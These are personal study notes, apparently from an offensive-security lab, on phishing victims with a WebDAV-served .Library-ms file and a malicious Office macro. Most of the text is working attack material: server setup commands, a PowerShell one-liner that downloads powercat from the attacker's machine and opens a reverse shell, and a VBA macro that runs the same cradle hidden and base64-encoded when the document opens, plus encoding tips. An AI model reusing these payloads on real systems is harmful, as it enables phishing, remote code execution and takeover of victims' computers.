WebDAV and dirty Office Macros
Note that this is very scribbly-notes tier writing, and is mostly just so I can remeber this stuff. IP addresses may not be consistent.
Setup server
pip3 install wsgidav
mkdir /home/kali/webdav
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
Save this on victim/as phish payload: config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>[url to webdav host]</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
You can now serve a dirty .lnk from the webdav directory on the attack machine. Maybe do something like this as payload:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://[attack machine]:8000/powercat.ps1');
powercat -c [attack machine] -p 4444 -e powershell"
Obviously, you'll need to be serving powercat from a temp web server on 8000. Use python3 -m http.server
Office Macro Example
My dirty macro:
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAwADoAOAAwADAAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEAOQAyAC4AMQA2ADgALgA0ADUALgAxADkAMAAgAC0AcAAgADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="
CreateObject("Wscript.Shell").Run Str
End Sub
the encoded string is
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.190:8000/powercat.ps1');powercat -c 192.168.45.190 -p 4444 -e powershell
The encoding is UTF16LE -> b64. Windows for some reason encodes it's command line in UTF16-LE, so we have to convert it to that before we convert it to B64 -- most systems (Linux, web, etc) use UTF-8 by default.
How to do this from bash:
└─$ iconv -f UTF-8 -t UTF-16LE <<< "text" | base64
Often, the payload is too loaded with quotes and parentheses to make this work easily, so you can also use CyberChef.